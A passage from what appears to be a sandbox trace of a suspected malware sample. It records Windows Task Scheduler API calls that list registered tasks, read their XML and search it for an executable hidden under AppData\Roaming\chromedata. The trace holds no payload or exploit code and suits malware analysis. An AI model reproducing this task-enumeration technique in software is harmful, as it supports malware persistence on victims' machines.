65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x31\x30\x2d\x31\x39\x54\x31\x33\x3a\x31\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0
	[0073.499] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x31\x30\x2d\x31\x39\x54\x31\x33\x3a\x31\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.499] IUnknown:Release (This=0x552388) returned 0x0
	[0073.499] IUnknown:Release (This=0x552948) returned 0x0
	[0073.499] ITaskFolder:GetFolders (in: This=0x552918, flags=0, ppFolders=0x12917c | out: ppFolders=0x12917c*=0x552948) returned 0x0
	[0073.500] ITaskFolderCollection:get_Count (in: This=0x552948, pCount=0x129174 | out: pCount=0x129174*=3) returned 0x0
	[0073.500] ITaskFolderCollection:get_Item (in: This=0x552948, index=0x12907c*(varType=0x3, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x1, varVal2=0x76a63ea3), ppFolder=0x12919c | out: ppFolder=0x12919c*=0x5523a0) returned 0x0
	[0073.500] ITaskFolder:GetTasks (in: This=0x5523a0, flags=1, ppTasks=0x129070 | out: ppTasks=0x129070*=0x5523f0) returned 0x0
	[0073.500] IRegisteredTaskCollection:get_Count (in: This=0x5523f0, pCount=0x129060 | out: pCount=0x129060*=0) returned 0x0
	[0073.500] IUnknown:Release (This=0x5523f0) returned 0x0
	[0073.500] ITaskFolder:GetFolders (in: This=0x5523a0, flags=0, ppFolders=0x129064 | out: ppFolders=0x129064*=0x5523f0) returned 0x0
	[0073.501] ITaskFolderCollection:get_Count (in: This=0x5523f0, pCount=0x12905c | out: pCount=0x12905c*=2) returned 0x0
	[0073.501] ITaskFolderCollection:get_Item (in: This=0x5523f0, index=0x128f64*(varType=0x3, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x1, varVal2=0x76fa8cd5), ppFolder=0x129084 | out: ppFolder=0x129084*=0x55fd38) returned 0x0
	[0073.501] ITaskFolder:GetTasks (in: This=0x55fd38, flags=1, ppTasks=0x128f58 | out: ppTasks=0x128f58*=0x55fd98) returned 0x0
	[0073.501] IRegisteredTaskCollection:get_Count (in: This=0x55fd98, pCount=0x128f48 | out: pCount=0x128f48*=0) returned 0x0
	[0073.501] IUnknown:Release (This=0x55fd98) returned 0x0
	[0073.501] ITaskFolder:GetFolders (in: This=0x55fd38, flags=0, ppFolders=0x128f4c | out: ppFolders=0x128f4c*=0x55fd98) returned 0x0
	[0073.505] ITaskFolderCollection:get_Count (in: This=0x55fd98, pCount=0x128f44 | out: pCount=0x128f44*=45) returned 0x0
	[0073.505] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.505] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55ff20) returned 0x0
	[0073.505] IRegisteredTaskCollection:get_Count (in: This=0x55ff20, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.505] IRegisteredTaskCollection:get_Item (in: This=0x55ff20, index=0x128d34*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c10e0) returned 0x0
	[0073.505] IRegisteredTask:get_Name (in: This=0x22c10e0, pName=0x128e3c | out: pName=0x128e3c*="AD RMS Rights Policy Template Management (Automated)") returned 0x0
	[0073.505] IRegisteredTask:get_Xml (in: This=0x22c10e0, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2006-11-10T14:29:55.5851926</Date>\r\n    <Author>$(@%systemRoot%\\System32\\msdrm.dll,-6001)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\msdrm.dll,-6002)</Description>\r\n    <URI>\\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"7dba1862-fdda-4030-83de-895375c111d4\">\r\n      <StartBoundary>2006-11-09T03:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n    <LogonTrigger id=\"06b3f632-87ad-4ac0-9737-48ea5ddbaf11\">\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1H</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-1-0</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <ComHandler>\r\n      <ClassId>{CF2CF428-325B-48D3-8CA8-7633E36E5A32}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.508] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2006-11-10T14:29:55.5851926</Date>\r\n    <Author>$(@%systemRoot%\\System32\\msdrm.dll,-6001)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\msdrm.dll,-6002)</Description>\r\n    <URI>\\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"7dba1862-fdda-4030-83de-895375c111d4\">\r\n      <StartBoundary>2006-11-09T03:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n    <LogonTrigger id=\"06b3f632-87ad-4ac0-9737-48ea5ddbaf11\">\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1H</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-1-0</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    